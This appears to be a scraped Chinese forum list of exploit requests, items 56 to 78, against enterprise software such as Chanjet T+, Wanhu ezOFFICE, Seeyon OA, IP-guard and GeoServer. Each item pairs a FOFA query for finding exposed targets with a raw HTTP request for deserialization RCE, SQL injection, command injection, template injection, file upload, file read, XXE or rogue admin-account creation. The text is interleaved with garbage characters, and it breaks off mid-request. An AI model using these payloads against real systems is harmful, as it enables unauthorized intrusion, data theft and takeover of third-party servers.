56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 `5 {3 c. H/ r, gFOFA: app="畅捷通-TPlus"
+ I7 e. L: X, Z$ Q2 dPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1' L( H! N- }" v% X+ Z4 F
Host: x.x.x.x7 l/ Q& l. E, [' e6 K4 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; N/ s/ {5 b" e/ C
Content-Type: application/json
2 y0 R: L% u, n- H
& l: g: E( L& e9 O! g, v- r, L{( B& q3 Y7 R  W8 m
  "storeID":{2 w3 o9 D/ }( s0 y+ e% G- a  G
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* T8 j* w3 y6 P! T4 N
   "MethodName":"Start",
( c! e9 l. r% u3 c$ J& O, t    "ObjectInstance":{3 a; Y  q+ d3 W1 S
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 Z  w  ~1 {6 q1 ?        "StartInfo": {3 {2 T$ `( `# E- i8 Z
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 @% @- C9 ^' g6 C9 o7 l9 V
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"  F8 [1 y' N2 h0 H1 g2 O; q
       }
3 q, T$ R: m3 h    }" {5 S7 A6 }0 J& G8 i+ k4 F
  }
8 n$ p, m4 T, V* O9 t* H' Q}
) x% n  [+ b( e, _0 m" q, l& R% ], F6 t( T  D
- m0 o' Y7 N. H0 s
57. 畅捷通T+ keyEdit.aspx SQL注入, j& ]8 D2 r' S/ o
FOFA:app="畅捷通-TPlus"
8 y# {, d5 W3 t) P7 HGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.12 D" T3 p! O9 r; }7 Q- R
Host: host
4 a  T# V- v- z+ jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( B- J3 |; X2 K2 G# I6 Q5 d+ ^
Accept-Charset: utf-8
7 G( I. M- }/ o: k: o/ H# F8 {Accept-Encoding: gzip, deflate0 z+ l7 n) G3 C; y' C
Connection: close. w# \- ]1 T2 s8 X
% B% j8 \6 p8 g

3 r, `0 r8 l" u4 S% q7 _6 [/ j/ i  ~58. 畅捷通T+ KeyInfoList.aspx sql注入5 X+ P: b! T5 `+ n5 X$ [
FOFA:app="畅捷通-TPlus") F6 Q8 ^% g3 G
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1- h' N) F; W8 r! ]% p; \5 A2 u
Host: your-ip
% B( ?  p& X$ P9 WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& C6 s% q1 S7 r8 B- ~% U) R7 H3 B
Accept-Charset: utf-8$ D$ a$ y6 y+ V, k2 @8 o
Accept-Encoding: gzip, deflate. |# ^/ q! j6 {" f: s- u. W' A$ W
Connection: close
* i& Q$ D  F' }& h6 h! c. [$ F4 p/ Y2 d

2 w4 Z% G$ _* e* n! W59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" e0 t$ o- D% K$ q" TFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
' S( _- D, C+ x' f% wPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.12 P: F7 X: {, }  @0 ^( \1 o
Host: 192.168.86.128:9090
$ v0 X% f- _! d2 fUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36( \0 j8 |; ]4 s1 }9 a
Connection: close
6 U0 [2 `9 {2 ~7 AContent-Length: 1669% q/ z& l( O, L+ [5 X* ~. W
Accept: */*
7 u& }; e& P5 @$ t( YAccept-Language: en
" X- @6 O$ {5 n: \Content-Type: application/x-www-form-urlencoded; {3 ~7 a4 G8 C* \1 g8 S5 S6 l3 W
Accept-Encoding: gzip% s* i8 P/ p4 _3 W; r, n

' o7 t7 S: E3 f2 ]# vPAYLOAD
2 |5 Z! b4 s. y/ w" d1 X  Z$ A; i1 i, F& w6 e8 v$ b: {

  c9 _5 H/ O& |( r; X, C. c60. 百卓Smart管理平台 importexport.php SQL注入
& {% E! V; s9 \  Z1 |: xFOFA:title="Smart管理平台"6 D; [3 e5 s' H4 ?
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
8 \, ^4 S  Z/ u. J1 MHost:* {, I1 r* M: z* C5 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 \5 |; Z6 J* t: {& _6 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% K; P- B6 H6 d6 W0 p2 G  X3 m) \1 NAccept-Encoding: gzip, deflate
" A, _8 ?: }2 k; \- rAccept-Language: zh-CN,zh;q=0.9
9 ]+ d  G5 h7 e! g) @Connection: close
! m2 g) S! r$ B7 }6 S8 Z- y! E, A& }& x( f% g9 h' Y

8 m: W( x: e: a61. 浙大恩特客户资源管理系统 fileupload 任意文件上传. ?1 g- I# O- ]# S/ [5 d0 R$ S# }
FOFA: title="欢迎使用浙大恩特客户资源管理系统"  A% A4 P6 k' M2 n/ J- D. \
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1, D4 Q# _. x& |
Host: x.x.x.x7 `, Z, t: V1 G5 y" F/ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& H/ x  a2 W7 m# G
Connection: close
5 u" G% H! e* JContent-Length: 27
9 T: ]2 u% x& j! c/ b: t8 LAccept: */*1 z" w- C$ G9 s, h- Q5 i6 l: M7 t2 t
Accept-Encoding: gzip, deflate
& k# X+ K: b" c' m. `Accept-Language: en- b% I9 S! c8 M: D
Content-Type: application/x-www-form-urlencoded
, l+ E1 B& _2 s9 z$ h  ~/ z1 Z/ z* P% A7 E+ d6 U$ J
8uxssX66eqrqtKObcVa0kid98xa
# m; f! [7 `. Q2 l) ~; u8 E! B1 J9 Z1 B. t# M# O2 s* f

  Z6 y' h# G( B* R62. IP-guard WebServer 远程命令执行0 X( u4 P2 b8 {: {% U' I2 S
FOFA:"IP-guard" && icon_hash="2030860561"
# V! Q9 v, S) {: @6 h8 LGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
* F) q1 T9 q7 u  J8 i; I3 q; o* [Host: x.x.x.x3 G( L$ [- l% X6 }! ]1 Z
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
$ R% A( ?" i, b8 e$ ^0 o: c* H  y: \Connection: close3 E# {- f4 f0 Y* X  O
Accept: */*, q, a1 p  Z* _6 m
Accept-Language: en
2 M" n3 C* [0 c" s. d: sAccept-Encoding: gzip
: I1 B$ t2 V( ~3 q' M, `/ z2 |. X: ]. S8 k' p+ D' }7 Z
" T# V9 L' `4 Q! [: G2 f% r- J- D
访问
* y6 N% H. D; k9 v- Q7 n* j2 @% @5 H- g& {/ R* `! [6 _4 z" Z( I
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.14 v& w6 B7 k; e! x/ L
Host: x.x.x.x. @2 e: N& M$ D: B/ Q/ }' |6 I

% n: R  v" y' ~3 ?8 z# a
' C! |9 G) {5 x0 j63. IP-guard WebServer任意文件读取
' f/ \( F! r/ t  H% ^7 D: eIP-guard < 4.82.0609.0( V# b* e6 U# L6 s. \
FOFA:icon_hash="2030860561"2 H2 j, S3 i! C
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# q, F! w/ h0 p0 w3 o$ t  e
Host: your-ip  y5 _5 [' N0 R4 k3 n9 @  y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 N* [- p5 E! E7 d$ z* D8 i/ kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 o5 S# I- F$ nAccept-Encoding: gzip, deflate
5 c+ [7 Q6 X- x' S5 \! I" kAccept-Language: zh-CN,zh;q=0.9
8 n. ]6 \  A1 N& eConnection: close
  Y; {# Z3 e4 bContent-Type: application/x-www-form-urlencoded* I( U0 A" ?7 }3 Z5 s2 I5 W

- E' m+ z  d2 X7 Cpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A, U" C$ A  ^7 g  A  ]
, f$ i4 M: S. M/ g/ B
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
' k- F' Z8 b) C+ G  x5 g' h$ H. rFOFA:body="/Scripts/EnjoyMsg.js"
& H2 @& X( P) VPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
  o" Y- o, B7 U5 wHost: 192.168.86.128:9001
) i: e! U0 f1 }% v/ |# X+ CUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.362 D9 T, X5 ]2 o; C# B1 a
Connection: close
  I4 o) V6 t( G$ WContent-Length: 3690 v( e" a& ~8 }+ Q+ z! A6 j2 k
Accept: */*0 G2 a6 P% n: S( C- \+ o
Accept-Language: en
8 e: Y* n7 ]- a6 ZContent-Type: text/xml; charset=utf-8
4 X: c) F5 s# l& {7 s' @3 E! UAccept-Encoding: gzip% c# f3 A1 i6 N4 ~' H

- U0 e# K7 I* j1 h<?xml version="1.0" encoding="utf-8"?>4 l- G  M0 u$ Z/ j/ I: |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">: c6 y( Z! I, _' e
<soap:Body>
* D, g) N; u$ c9 B+ q    <GetOSpById xmlns="http://tempuri.org/">3 {% c. `% b& M
      <sId>1';waitfor delay '0:0:5'--+</sId>
9 b# I" {3 o# X4 a6 b    </GetOSpById>, n( z1 c2 ~, C0 u, z, u& D- ^" F$ ?) f
  </soap:Body>! f  Y  l% W: d/ I1 U
</soap:Envelope>
' N) I2 h% M  O* a
( z; z, z5 ^; W7 h. @0 p5 x$ V, A9 q0 F/ d( }" I. Q
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ x! i0 ?7 \! j) E! t: GFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"+ l& C" @: M" W) }- G
响应200即成功创建账号test123456/123456/ a8 W& g) C* t7 ^7 S9 i) Q
POST /SystemMng.ashx HTTP/1.1
( x$ F, L" a2 |) Q, K- DHost:
& q- A1 X7 ?) G7 o: A! a/ c* ^User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
/ r2 G" u. M8 LAccept-Encoding: gzip, deflate6 K9 J! X- m* M5 c* J5 u
Accept: */*" Z' s6 C# @* Q1 n
Connection: close
; h4 w$ ^. u& ^1 O% s: XAccept-Language: en# F; S5 m$ ?1 L1 I" r8 @  y
Content-Length: 174' L* I6 e7 B; i9 I; U1 l" O

* h3 u- F3 l! V2 U( c) ?! DoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
9 L# Q! i4 V+ A) b+ n+ W4 C6 @2 }  ?& N( S: q# N! N& _

" q2 e( E7 ?4 {4 D. `6 W, K. }" h66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% N5 E4 h* i" \
FOFA:app="万户ezOFFICE协同管理平台"8 a+ M  X) i7 B' [  r

# b1 o# v0 N/ a: c/ ?* yGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, V$ j* C0 l) `- D8 p. v
Host: x.x.x.x
7 p2 L1 q" H8 D* i7 F1 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ P- R0 n1 i. TConnection: close
8 d- q7 x7 R; c0 g+ b$ ZAccept: */*& y$ Q4 N7 l1 k( g
Accept-Language: en
/ Q! N. g$ y* }" k! \% KAccept-Encoding: gzip
, x; W& _- ~1 R' E/ y. R0 w7 G8 V2 }4 H" q$ s# E1 X& h0 q
  C* a+ F/ v, l1 ]) d* Y0 o7 I& ]
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在, T! O# q  F2 O- s( s6 Y

& F* W( Z3 ?$ F5 n- x67. 万户ezOFFICE wpsservlet任意文件上传- V4 ~5 f; D  p. i9 v
FOFA:app="万户网络-ezOFFICE"3 p5 d9 |  g* ~! m8 c# P
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
0 ~0 M1 j* H% Y+ y! RPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1% Z3 H! _  h# s8 C9 n3 i' @: d' ^  O4 }
Host: x.x.x.x. b& b) K' Y3 R% I$ v' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
9 [; h8 }4 H  P7 ~7 }' vContent-Length: 173! O% u* u4 ~) _' O+ D! r+ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
! c! Y) g0 p" dAccept-Encoding: gzip, deflate
, ?7 b1 o' |6 U4 C% cAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 t* I* J9 b/ X* n; {$ ~Connection: close
& o4 k9 A7 n+ ]" V  S+ C9 T- jContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
) F, E  S1 ^' o0 b* M) r0 PDNT: 1) ?  x. i- D4 {% A' e
Upgrade-Insecure-Requests: 1
# M3 F' l6 r1 {$ ~1 S) l. r# B" {" _# d! T) B3 O
--ufuadpxathqvxfqnuyuqaozvseiueerp  B2 ^4 O6 S1 T  a- o( h5 \% Y( A7 w
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! J5 y3 m- w( _9 _8 Q/ o: @( y* V9 ]3 [" S+ q
<% out.print("sasdfghjkj");%>" Q3 D) E7 v& k: \" W/ k
--ufuadpxathqvxfqnuyuqaozvseiueerp--
$ O2 k, W- H0 q, u! l6 E
8 D7 P# v+ y8 ]' k" s3 |6 ^
/ l* o. o9 {3 O' q  L' E; n文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
9 b7 w2 L) X5 @0 Q9 s# e) U; e
7 V- Y1 r+ S9 H6 d. k/ J68. 万户ezOFFICE wf_printnum.jsp SQL注入
* [$ ~! s1 e: k' y& SFOFA:app="万户ezOFFICE协同管理平台"6 Z( U+ h! e: c. o0 [: ^& [
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 g/ _; N& u% `) ]Host: {{host}}
- h. ]# H. E3 Y& c+ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. b# s' `- g/ W& p
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
4 Y9 R$ ]1 J3 }0 y" G1 ~Accept-Encoding: gzip, deflate. K8 t% M" P  Q+ }
Accept-Language: zh-CN,zh;q=0.9
# v3 j& D, m' o5 C# ]$ j) w& `Connection: close. x+ q' @6 z/ C- m2 |1 D. k( k' I
. l( H( K! S  h+ d
% h! y% ^& ~* T
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 E+ D2 t# |# PFOFA:app="万户ezOFFICE协同管理平台"
8 F  k9 u- j6 S) p5 I4 ~; ZGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
! U+ b/ O! C, FHost: your-ip
1 i8 I( ~7 Y) ~& pUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 M6 e$ r$ W& H8 |Accept-Encoding: gzip, deflate
! ^7 n& z0 g& FAccept: */*# I9 d5 Y  m( {0 }/ t
Connection: keep-alive! t3 z# r$ W2 j0 q
; W1 C. e! C, s* M: X$ ]/ l
6 V0 Z  f2 W$ d/ E
70. 万户ezEIP success 命令执行
. ~  v% W( X1 Y. R; rFOFA:app="万户网络-ezEIP"
# C: i" l' a, ~! {POST /member/success.aspx HTTP/1.1
: P, i  z; o1 k5 S) K+ X" _Host: {{Hostname}}- C% z. M( s& S2 _# l# Y7 l5 A: y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, d( ?2 K7 i# h) @3 a
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=; f& Y. T8 d  N) }! ^
Content-Type: application/x-www-form-urlencoded
, v+ K/ N: j& ^# H0 Y3 u' c! STYPE: C/ ?* E3 y6 `1 E( J- `7 [3 q
Content-Length: 16702( \* t# m( i3 \, M

5 Q' r% R- t/ `! e6 W__VIEWSTATE=PAYLOAD
* I) p5 \3 Y: A9 e, v4 l4 M- ]/ G; `" R

# V6 F0 ^. H) |71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
' ^4 m1 L" _: T- e, v) O' EFOFA:body="PM2项目管理系统BS版增强工具.zip"
7 w; q5 B4 ~. C6 W) _/ M8 s3 uGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
- [8 \* \$ Z  X. j$ {5 B) qHost: x.x.x.xx.x.x.x5 g6 w& V1 c- p- M1 q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 O8 e" H/ f3 t9 x" x+ g; MConnection: close2 [! i; e" C+ O& M# a5 |2 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  d* e3 K: J5 y* ?2 ]: ~3 @8 a% m
Accept-Encoding: gzip, deflate
  A7 h# k" A! I; X& j* w- yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ Y: O2 [' l& [+ d) OUpgrade-Insecure-Requests: 1
6 _; O1 g( Q- M4 X' T' R! [0 }6 u9 u1 {2 z

0 v. F/ {' b7 R' ^0 [72. 致远OA getAjaxDataServlet XXE
* U& Q: r' g1 s0 O: zFOFA:app="致远互联-OA"/ @0 k8 y3 o3 b+ p$ U* J5 S, t( E
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1) ^' S0 t: Y+ L, v' M# ^
Host: 192.168.40.131:8099' \' d  m& n, `2 {3 d
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 l  d7 \5 k4 G& K' P; [
Connection: close
% l% f, {" p5 Y. ?) L7 y0 vContent-Length: 583/ t4 Y2 e& Y. e9 s, j! `' h6 {
Content-Type: application/x-www-form-urlencoded
$ o. K4 w  `% l  P) iAccept-Encoding: gzip
. H6 s- o" d- E  F. K% u7 r/ d/ T
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E& ^: {. X8 F1 d0 \1 f2 p- y0 ?% k
# a( |* [% o6 @# H* v1 V6 ?

( e" x% x+ j9 n8 @4 T: [73. GeoServer wms远程代码执行6 C3 {* z, T! T* {
FOFA:icon_hash=”97540678”
$ T" i+ a/ k" n. U8 v1 zPOST /geoserver/wms HTTP/1.1
/ A4 f" z9 @& }9 c( D+ VHost:
8 w' f& R& }# N2 k8 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; D. ^, A* E9 \( R& k  JContent-Length: 1981
  b# d9 U2 ]6 ^Accept-Encoding: gzip, deflate
6 T0 D2 s- x0 Q- j( p6 L& G1 g) gConnection: close6 ]/ N; z4 F0 Z" O; y# R" L
Content-Type: application/xml
- r  k* v* H: f$ tSL-CE-SUID: 3
/ o2 U6 h2 h# U9 Q$ G# w1 a9 t. o5 S; L0 D/ O# ]
PAYLOAD4 R3 {2 o* ?9 i
" s; N9 I2 d. j' w9 A, c6 K- K
+ d: x: d# u! N  a9 s9 ~7 I
74. 致远M3-server 6_1sp1 反序列化RCE
, L' U* g, o4 p2 k+ SFOFA:title="M3-Server"
9 W& y% N) `6 S& [' }  W0 a  VPAYLOAD
# |8 t& V- ?* `" q( X$ Q
' I: q9 w9 p8 W, V0 E75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
3 O# t% W5 U9 U. z4 E; e- hFOFA:app="TELESQUARE-TLR-2005KSH"2 z# z" q! S  `& }
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ P! z/ N) t8 d. _Host: x.x.x.x
6 O# g- B' K9 z7 n& w2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 S7 r/ a# m5 i" QConnection: close) T; v4 `! {/ z1 F" K$ t! o
Accept: */*
+ l+ h- Q. t  @$ xAccept-Language: en
$ J1 u+ b) D. y$ l# D" w1 d% mAccept-Encoding: gzip
3 O4 `' \3 p% k: [0 z1 |0 Z" O5 h6 g' R$ e* K* d* ^4 \
5 ^- w/ c" v1 W
GET /cgi-bin/test28256.txt HTTP/1.1
, q) V' g' Y4 k: i8 i; w- X, LHost: x.x.x.x
( A" c( h5 ~" X2 |" l' I; \( C  w1 x
* z% S# z# L+ c' v$ H) g. F
76. 新开普掌上校园服务管理平台service.action远程命令执行" ^  B- `5 @. c+ V# C' \
FOFA:title="掌上校园服务管理平台"
4 r* u7 t0 v# P1 u6 f! K( ZPOST /service_transport/service.action HTTP/1.1
. Y( t2 ^4 s5 ], yHost: x.x.x.x
, e0 y2 O  i% X: ^9 }5 G' _! EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4 @: T& o% G1 u6 v( ~2 vConnection: close+ L/ t& h/ P) j
Content-Length: 211
& A( ~* [- H. cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 o- l$ J3 B% l# c& c! r; A
Accept-Encoding: gzip, deflate
5 H/ b; L8 i; y( D- qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- t" l) [5 F+ M7 q' O: E4 V4 p
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
2 w2 P) Z, P( fUpgrade-Insecure-Requests: 1
) f% m4 e6 u; M' m' d* N; p0 U- B8 g. h" [: P9 V5 F* a1 ^( g& H
{4 w) y' v7 u$ w& N) b. Y7 w1 c
"command": "GetFZinfo",
2 b/ n. m+ N" w+ G& K8 F  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* Q9 {( i/ G/ ^2 k  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
5 E+ _$ U4 |! ?# V# N}
2 ]# w( s1 J+ O" D! v: o( \2 k, r2 v, V2 h9 d

1 D# w, \* M, _$ zGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
) B0 e4 ]2 l  X# [" zHost: x.x.x.x
+ k9 ^$ @) B' B0 b" S" M
* H/ g* ^. |  E0 q1 h, n1 `1 D9 i, |9 X& z

1 G2 [. o; r2 ?6 J77. F22服装管理软件系统UploadHandler.ashx任意文件上传2 h3 p' \- M) m: z+ {& K3 C! z. H
FOFA:body="F22WEB登陆"
$ H. V3 B  b4 c3 F8 P3 C* xPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1$ [! q. K- }& g7 O& N
Host: x.x.x.x
9 i5 y5 n& h0 {  U6 C# }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 i& D8 q4 ^; q& V# \2 \% h7 rConnection: close
* t! L# H! h) N6 w/ Q8 L% kContent-Length: 433
% |& Y+ G4 u2 i6 ~4 OAccept: */*
. w: {% E9 S" m- Y# i) MAccept-Encoding: gzip, deflate: ~3 s" f' ?  M# V0 @5 L- {
Accept-Language: zh-CN,zh;q=0.9: B0 {* K, n' p9 b) P% Q  P( M# e
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
, Q& h! I. Q! X, _1 ~$ ]5 D; ]( o' Q9 i
------------398jnjVTTlDVXHlE7yYnfwBoix
: }1 G$ {4 U3 S* f' `8 [Content-Disposition: form-data; name="folder"
- R/ @/ |- P# F; b8 D8 h0 k: C/ q. Q% l7 L* \$ d! S7 F; y
/upload/udplog/ N7 L& J/ a7 W9 X% T( c
------------398jnjVTTlDVXHlE7yYnfwBoix
) ?! i+ K0 w5 R' u# ^- g8 ]' NContent-Disposition: form-data; name="Filedata"; filename="1.aspx"$ i. @+ m' C# N2 c
Content-Type: application/octet-stream
5 T4 Q* r) L! I/ M! `* c
) F( M- i# s- h+ f0 Bhello1234567
9 |4 g7 k- }+ K/ Q* g! y. _# k0 A------------398jnjVTTlDVXHlE7yYnfwBoix: v, b; f" S* v4 t  P7 \" C/ b
Content-Disposition: form-data; name="Upload"
5 J9 \' z9 {6 X: i- [. ], e  n, @2 p
- K5 Q2 T% K4 G; m2 V7 e0 cSubmit Query
0 v, ^% b5 Q7 B! I: J. @3 i/ b------------398jnjVTTlDVXHlE7yYnfwBoix--
8 m& _( S% H% A7 _/ v' U7 B" i/ I1 O7 v' W
; s* K0 p5 M, {; v& E5 Y7 a
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 _4 C$ p9 Y0 C5 @% N% @) ^FOFA:icon_hash="2001627082"2 p3 R, o# ]. E5 Q
POST /Platform/System/FileUpload.ashx HTTP/1.13 w4 h8 |& p6 z" e( T& l
Host: x.x.x.x
: R/ L2 t' O: k3 X$ ~% n  |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! E% a7 n/ C" H3 @Connection: close2 a, O  [, H! {( B( t" M
Content-Length: 3369 ]5 O0 ?: V6 R' |/ g" C9 b
Accept-Encoding: gzip
% d$ D; z1 i: f( ]. K# XContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
4 \- S" i& I- {! ]1 B4 k3 Z- q
